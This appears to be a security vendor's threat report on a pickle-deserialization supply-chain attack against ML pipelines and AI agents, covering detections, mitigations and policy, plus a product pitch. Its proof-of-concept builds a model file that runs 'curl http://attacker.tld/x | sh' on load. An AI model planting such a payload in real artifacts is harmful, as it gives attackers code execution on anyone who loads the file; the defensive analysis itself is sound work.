Executive Summary

pickle deserialization, and it is the focus of this article.

- Full server compromise

- Lateral movement via stolen credentials

- Ransomware deployment

ShadowPickle is a supply chain attack on MLOps pipelines and enterprise AI infrastructure. It abuses Python's pickle format, which executes embedded instructions every time it is loaded. When a poisoned legacy model (.pt, .pth, .ckpt, .pkl) is pulled from a public registry like Hugging Face and opened in code, the attacker's payload runs immediately, with no click and no warning.

Roughly 100 malicious models have already been catalogued on Hugging Face alone.[1]

Our assessment

The ShadowPickle deserialization vector represents a systemic vulnerability across the AI ecosystem, not a Hugging Face-specific issue. The same insecure deserialization path appears in distributed MLOps platforms such as Ray and Kubeflow, in data formats such as Parquet loaded via cloudpickle, and in agentic frameworks such as LangChain and CrewAI, where "poisoned memories" and serialized state transfers can allow an attacker to inherit the agent's identity and permissions.

Background: Pickle and MLOps

What is Pickle?



pickle is Python's built-in serialization format, used to save objects, including trained models, configuration, and intermediate data, to disk for later loading. Crucially, a pickle file does not simply contain data; it contains instructions for reconstructing objects. When Python loads a pickle file, those instructions are executed.

This is the source of the vulnerability. A maliciously crafted pickle file can include instructions that execute arbitrary code at load time, with no user interaction required. Both Python's official documentation and Hugging Face's security guidance state plainly that pickle is not safe to load from untrusted sources and can execute arbitrary code during unpickling.[2][3]
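A harmless way to see this behaviour is to pickle an object whose reconstruction recipe points at a benign function. The sketch below is illustrative only: the class name `Demo` is hypothetical, and it relies on the `__reduce__` hook that this article covers in more detail later. Loading the bytes does not give back a `Demo` instance; it gives back whatever the embedded callable returned.

```python
import os
import pickle


class Demo:
    """Hypothetical class used only to show load-time execution."""

    def __reduce__(self):
        # Tell pickle: "to rebuild me, call os.getcwd() with no arguments".
        # os.getcwd is harmless; an attacker would pick something else.
        return (os.getcwd, ())


blob = pickle.dumps(Demo())

# The loader calls os.getcwd() on our behalf while "reading" the data.
result = pickle.loads(blob)
print(type(result).__name__, result)
```

Nothing in the calling code asked for `os.getcwd()` to run; the request came from the file.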

What is MLOps?

MLOps is the discipline of operationalizing machine learning: the pipelines, tooling, and governance that move a model from research into production. In practice, it is the AI equivalent of DevOps, encompassing continuous integration and deployment, model versioning, and provenance tracking.

Modern MLOps pipelines routinely consume third-party assets (pretrained models, datasets, and supporting components) from public sources such as Hugging Face, GitHub, and other registries. Any compromised artifact in that supply chain executes inside the pipeline that loads it, frequently within an environment that holds cloud credentials, GPU resources, and direct access to production data.

How this attack shows up

The pattern usually looks like this: a fresh container or pod, spun up solely to evaluate an open-source model, makes an unexpected outbound connection. The workload has no inbound exposure, no interactive shell sessions, and no post-deploy human activity, yet a monitoring tool picks up traffic that looks like a remote-shell callback.

Standard explanations can be eliminated quickly:

- The base container image is clean

- All PyPI dependencies pass integrity checks

- No one has logged into the node

The only meaningful untrusted input is the model artifact itself, pulled from a public registry like Hugging Face.

That leaves one explanation: a legacy, pickle-based model artifact executed attacker-controlled code during deserialization.

How the attack works



Legacy frameworks, including PyTorch and scikit-learn, have historically saved models via Python's built-in pickle module (commonly .pt, .pth, .pkl).

Pickle is not a static data format like JSON. It is effectively a stack-based VM with arbitrary code-execution primitives: loading a pickle file does not merely read data; it may execute instructions on the host.
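To make the "stack-based VM" description concrete, here is a small hand-written pickle program in the oldest text protocol (protocol 0). It is a sketch for illustration, not taken from any real artifact: the byte string pushes the built-in `len`, builds an argument tuple, and issues the REDUCE opcode, which calls the function. The standard library's `pickletools` module lists the opcodes without executing them.

```python
import pickle
import pickletools

# A hand-assembled pickle "program" (protocol 0):
#   c builtins len   -> GLOBAL: push the callable builtins.len
#   (                -> MARK:   remember the current stack position
#   V abc            -> UNICODE: push the string "abc"
#   t                -> TUPLE:  collapse everything since MARK into ("abc",)
#   R                -> REDUCE: pop callable and args, push callable(*args)
#   .                -> STOP:   return the top of the stack
PROGRAM = b"cbuiltins\nlen\n(Vabc\ntR."

# Static view: list the opcodes without running them.
opcodes = [op.name for op, _arg, _pos in pickletools.genops(PROGRAM)]
print(opcodes)

# Dynamic view: loading the bytes runs the program.
result = pickle.loads(PROGRAM)
print(result)  # -> 3
```

Swapping `builtins.len` for any other importable callable is all it takes to turn this from a curiosity into a payload, which is why static scanners look for GLOBAL and REDUCE opcodes.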

The core vulnerability: __reduce__

The __reduce__ method specifies a callable and the arguments used to reconstruct an object. An attacker can override it so that unpickling the object invokes an arbitrary callable, and torch.load() will execute that callable during load unless weights_only=True is in effect.

A minimal proof of concept fits in eight lines:

```python
import pickle, os

class Exploit:
    def __reduce__(self):
        # Runs the moment the file is unpickled - no model load required.
        return (os.system, ("curl http://attacker.tld/x | sh",))

with open("model.pt", "wb") as f:
    pickle.dump(Exploit(), f)
```

The single most important short-term mitigation is weights_only=True, which is the default in PyTorch 2.6+ and refuses to invoke arbitrary callables during unpickling:

```python
import torch

# PyTorch >= 2.6: weights_only=True is the default.
# Pin it explicitly on older PyTorch versions,
# and never set it to False on untrusted artifacts.
state = torch.load("model.pt", weights_only=True)
```

This is a stop-gap, not a strategy. Safetensors remains the long-term answer because it removes code execution from the load path entirely.
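The allowlisting idea behind weights_only=True can be illustrated with the standard library alone. The sketch below is not PyTorch's implementation; it follows the "restricting globals" pattern from the Python pickle documentation, and `ALLOWED_GLOBALS`, `AllowlistUnpickler`, `safe_loads`, and `Payload` are hypothetical names chosen for this example.

```python
import io
import os
import pickle
from collections import OrderedDict

# Assumption: the only global a legitimate checkpoint needs in this toy setup.
ALLOWED_GLOBALS = {("collections", "OrderedDict")}


class AllowlistUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Called whenever the pickle stream asks to import a global.
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"blocked global {module}.{name}")


def safe_loads(data: bytes):
    return AllowlistUnpickler(io.BytesIO(data)).load()


class Payload:
    def __reduce__(self):
        # Benign stand-in for an attacker-chosen callable.
        return (os.getcwd, ())


# A plain container of numbers loads normally.
weights = safe_loads(pickle.dumps(OrderedDict(bias=0.5)))

# A stream that tries to import anything else is refused before it runs.
try:
    safe_loads(pickle.dumps(Payload()))
    blocked = False
except pickle.UnpicklingError:
    blocked = True

print(weights, blocked)
```

An allowlist like this narrows what a file can call, but it still parses an executable format, which is why the article treats it as a stop-gap rather than an end state.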

Why Agentic Changes the Math

Classic AI risk and agentic AI risk are not the same problem. A CISO who carries a chatbot threat model into an agentic deployment will systematically underestimate the blast radius.

- Classic AI: confidentiality risk. The worst case is data leakage in output, a sensitive string appearing in a generated answer.

- Agentic AI: integrity and availability risk. The worst case is real actions executed under real credentials: a database write, a wire transfer, a production deploy, a cloud-resource teardown.

- ShadowPickle: the first widely exploitable bridge between supply chain risk and agent-action risk. A single poisoned weights file in a model registry becomes arbitrary code running inside a workload that holds your production cloud credentials.

Because these attacks happen at load time, the damage is already done even if a human reviews the AI's output. The system is compromised before a single word is generated. Output review cannot defend against payloads that fire during deserialization.

Load-Time Agent Hijack (LTAH)

A class of agentic AI compromise where the malicious payload executes during artifact deserialization, before the agent ever produces a token of output.

Glass Weight names the tactic. ShadowPickle names the technique. Load-Time Agent Hijack names the category your governance, your detections, and your incident-response runbooks need to recognize before they can defend against it.

Where Arrakis sits in the kill chain

File scanners, Picklescan, and SOC alerts all operate on the same assumption: that you can catch the malicious artifact before it executes. ShadowPickle breaks that assumption. The payload fires the instant torch.load() is called, often inside a short-lived inference pod that holds production credentials.

Arrakis sits one layer down, on the action plane. When the compromised model attempts to act on the world (invoking boto3.client("s3").delete_bucket(...), opening an outbound socket, executing a shell command, or writing to a production database), Arrakis intercepts the call, validates it against the agent's declared task, and quarantines the workload identity before the action reaches the underlying system.

- Detection latency does not become breach latency. Even if every static scanner misses the file and every SOC rule fires after the fact, the destructive action is blocked at the moment it is attempted.

- Credential blast radius is bounded. A compromised pickle gets shell on the pod, but cannot reuse the pod's IAM role to pivot.

- Output review becomes optional, not load-bearing. Arrakis enforces policy regardless of whether a human reads the agent's reasoning.

This is the control plane the "Human-in-the-Loop" fallacy assumes already exists. It does not, by default. Arrakis is how you build it.



How attackers operate

Model registries are being abused the same way package registries (npm, PyPI) have been abused for years. Attackers don't need novel tradecraft; they just publish convincingly named models and wait for someone to load them.

The most common moves are:

- Typosquatting model names to catch rushed prototyping or copy-paste errors

- Publishing poisoned legacy artifacts to public model hubs

- Targeting platform services within the model supply chain, such as the format-conversion service abuse documented in HiddenLayer's Silent Sabotage research.[4]
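One inexpensive guard against the typosquatting move is to compare every requested model name against an internal allowlist and flag near misses. The sketch below uses the standard library's `difflib`; the model names, the `APPROVED_MODELS` set, the `classify` helper, and the 0.9 similarity threshold are all assumptions made for illustration and would need tuning against a real catalogue.

```python
from difflib import SequenceMatcher

# Hypothetical allowlist of vetted model identifiers.
APPROVED_MODELS = {
    "acme-ai/sentiment-base",
    "acme-ai/vision-encoder-large",
}


def similarity(a: str, b: str) -> float:
    return SequenceMatcher(None, a.lower(), b.lower()).ratio()


def classify(requested: str, threshold: float = 0.9) -> str:
    """Return 'approved', 'possible-typosquat', or 'unknown'."""
    if requested in APPROVED_MODELS:
        return "approved"
    best = max(similarity(requested, name) for name in APPROVED_MODELS)
    # Very close to an approved name, but not identical: worth a human look.
    return "possible-typosquat" if best >= threshold else "unknown"


for name in ("acme-ai/sentiment-base",
             "acme-al/sentiment-base",
             "someone/unrelated-model"):
    print(name, "->", classify(name))
```

A check like this fits naturally in a registry proxy or a pre-commit hook, where a rejected name costs a developer seconds rather than an incident.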

Detections SOC can deploy this week

The clearest signal is any unverified pickle-based load (.pt, .pth, .ckpt, .pkl) running in production from an external source. This section is forwardable: drop it into your detection-engineering channel and you should have rules in staging the same day.

1. File-load detections

- Sigma rule sketch: Python process invoking torch.load() or pickle.Unpickler.load against a path outside an allowlisted registry mount.

- Python audit hooks (PEP 578): register a hook with sys.addaudithook to flag pickle.find_class events, which fire whenever pickle.Unpickler.load resolves a global, in production workloads; alert on first use per workload identity. (pickle.Unpickler.load runs in user-space Python, so syscall-level tooling such as auditd or eBPF does not see it directly.)

- YARA pointer: scan for __reduce__ patterns inside .pt, .pth, .ckpt, .pkl artifacts before they enter the model registry. In the serialized stream these typically appear as GLOBAL or STACK_GLOBAL imports followed by a REDUCE opcode rather than as the literal string.
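The audit-hook detection can be prototyped in a few lines. The sketch below registers a hook for the `pickle.find_class` audit event, which CPython raises with the module and name of each global an unpickler resolves. The `EXPECTED_MODULES` allowlist, the `alerts` list, and the `Benign` class are hypothetical; a real deployment would forward alerts to its logging pipeline instead of appending to a list.

```python
import pickle
import sys

# Assumption: modules a legitimate checkpoint is expected to import.
EXPECTED_MODULES = {"collections"}

alerts = []


def pickle_audit_hook(event, args):
    # Audit hooks see every audited event, so return quickly for the rest.
    if event != "pickle.find_class":
        return
    module, name = args
    if module not in EXPECTED_MODULES:
        alerts.append((module, name))


# Note: audit hooks cannot be removed once installed.
sys.addaudithook(pickle_audit_hook)


class Benign:
    def __reduce__(self):
        # Harmless stand-in for a payload: asks the loader to call len("abc").
        return (len, ("abc",))


pickle.loads(pickle.dumps(Benign()))
print(alerts)
```

Because the hook runs inside the interpreter, it sees the import request even when the file never touches disk in a place a file scanner watches.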

2. Process-tree heuristics

- A Python parent process spawning a shell, curl, wget, or a socket call within N seconds of a model load is a high-confidence indicator.

- Correlate with sudden DNS lookups to non-allowlisted domains from inference pods.
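The time-window correlation in the first heuristic can be sketched over a generic event stream. Everything about the schema here is an assumption: the `Event` fields, the `"model_load"` and `"process_spawn"` kinds, the `SUSPICIOUS_BINARIES` set, and the 30-second default standing in for N would all be replaced by whatever the local telemetry actually emits.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Event:
    ts: float       # seconds since an arbitrary epoch
    workload: str   # pod or container identity
    kind: str       # "model_load" or "process_spawn" (hypothetical schema)
    detail: str     # artifact path or spawned binary name


SUSPICIOUS_BINARIES = {"sh", "bash", "curl", "wget"}


def spawns_after_load(events, window_s: float = 30.0):
    """Return suspicious spawns that follow a model load in the same workload."""
    last_load = {}
    flagged = []
    for event in sorted(events, key=lambda e: e.ts):
        if event.kind == "model_load":
            last_load[event.workload] = event.ts
        elif event.kind == "process_spawn" and event.detail in SUSPICIOUS_BINARIES:
            loaded_at = last_load.get(event.workload)
            if loaded_at is not None and event.ts - loaded_at <= window_s:
                flagged.append(event)
    return flagged


sample = [
    Event(10.0, "pod-a", "model_load", "/models/model.pt"),
    Event(12.5, "pod-a", "process_spawn", "curl"),   # inside the window
    Event(400.0, "pod-a", "process_spawn", "bash"),  # too late to correlate
    Event(11.0, "pod-b", "process_spawn", "curl"),   # no model load seen
]
flagged = spawns_after_load(sample)
print(flagged)
```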

3. Network signatures

- Unexpected egress from GPU inference pods that have no inbound traffic and no interactive sessions, the exact scenario described earlier in the post, formalized as a detection.

- Outbound connections from short-lived evaluation containers, especially to non-corporate ASNs, within 60 seconds of pod start.

4. Catalog-based detections

- Hash-block the ~100 publicly catalogued malicious Hugging Face models at the registry mirror or proxy layer.

- Maintain a rolling feed of newly disclosed malicious model hashes from JFrog, HiddenLayer, and Trail of Bits research.
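Hash blocking at a mirror or proxy reduces to a digest lookup. The sketch below assumes the blocklist is a set of SHA-256 hex digests; the helper names `sha256_of` and `is_blocked` are hypothetical, and the digests here are computed from stand-in files rather than taken from any published feed.

```python
import hashlib
import tempfile
from pathlib import Path


def sha256_of(path, chunk_size: int = 1 << 20) -> str:
    """Stream the file so multi-gigabyte checkpoints do not fill memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for block in iter(lambda: handle.read(chunk_size), b""):
            digest.update(block)
    return digest.hexdigest()


def is_blocked(path, blocklist) -> bool:
    return sha256_of(path) in blocklist


with tempfile.TemporaryDirectory() as tmp:
    bad = Path(tmp) / "bad.pkl"
    good = Path(tmp) / "good.safetensors"
    bad.write_bytes(b"stand-in for a known-bad artifact")
    good.write_bytes(b"stand-in for a clean artifact")

    # In practice this set would be loaded from a maintained feed.
    blocklist = {sha256_of(bad)}

    bad_blocked = is_blocked(bad, blocklist)
    good_blocked = is_blocked(good, blocklist)

print(bad_blocked, good_blocked)
```

Exact-hash matching only catches artifacts that have already been catalogued, so it complements the behavioural detections above rather than replacing them.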

For teams that map findings against MITRE ATLAS, this corresponds to AML.T0018.002 (Embed Malware) and AML.T0011.000 (Unsafe AI Artifacts). The publicly documented Hugging Face incident is catalogued as case study AML.CS0031 (Malicious Models on Hugging Face), which is also the canonical reference for Picklescan-bypass tradecraft.

Governance and policy

"All ML model artifacts entering production environments must be distributed in Safetensors format. Pickle-based formats (.pt, .pth, .ckpt, .pkl) are prohibited outside of isolated evaluation sandboxes and require cryptographic provenance plus pre-load static analysis. Any agentic system loading model artifacts must operate under the Principle of Least Privilege, with credential scopes limited to the specific actions required for its declared task."

- Procurement: require Safetensors plus signed provenance in vendor MSAs and DPAs.

- Audit: treat pickle-based artifact loads in production as a reportable control failure.

- Incident response: add a Load-Time Agent Hijack runbook that assumes host compromise from first byte read.
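The audit control can be backed by a simple source-code check. The sketch below walks a Python file's syntax tree and reports every `torch.load(...)` call that is not explicitly pinned to `weights_only=True`. The helper name `find_unpinned_torch_loads` is hypothetical, and the check is deliberately narrow: it matches only the literal `torch.load` spelling, so aliased imports such as `from torch import load` would need extra handling.

```python
import ast


def find_unpinned_torch_loads(source: str) -> list[int]:
    """Return line numbers of torch.load calls lacking weights_only=True."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        func = node.func
        is_torch_load = (
            isinstance(func, ast.Attribute)
            and func.attr == "load"
            and isinstance(func.value, ast.Name)
            and func.value.id == "torch"
        )
        if not is_torch_load:
            continue
        pinned = any(
            kw.arg == "weights_only"
            and isinstance(kw.value, ast.Constant)
            and kw.value.value is True
            for kw in node.keywords
        )
        if not pinned:
            findings.append(node.lineno)
    return sorted(findings)


SAMPLE = '''import torch
a = torch.load("a.pt", weights_only=True)
b = torch.load("b.pt")
c = torch.load("c.pt", weights_only=False)
'''

print(find_unpinned_torch_loads(SAMPLE))  # -> [3, 4]
```

Run in CI, a check like this turns the policy statement into a failing build instead of a finding in next quarter's audit.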

Action checklist

- Inventory .pkl and .pt files in S3, GCS, and internal model registries.

- Migrate model artifacts to the safetensors format.[5]

- Set weights_only=True on every torch.load() call as a stop-gap until Safetensors migration completes. Treat any weights_only=False in production code as a reportable exception.

- Scan any remaining pickle artifacts with fickling or equivalent before they reach production.[6]

References

[1] JFrog, Data Scientists Targeted by Malicious Hugging Face ML Models with Silent Backdoor: jfrog.com/blog

[2] Hugging Face, Pickle Scanning and Security: huggingface.co/docs/hub/security-pickle

[3] Python documentation, pickle, Python object serialization: docs.python.org/3/library/pickle.html

[4] HiddenLayer, Silent Sabotage: Hijacking Safetensors Conversion: hiddenlayer.com/research/silent-sabotage

[5] Hugging Face, Safetensors documentation: huggingface.co/docs/safetensors

[6] Trail of Bits, fickling: github.com/trailofbits/fickling
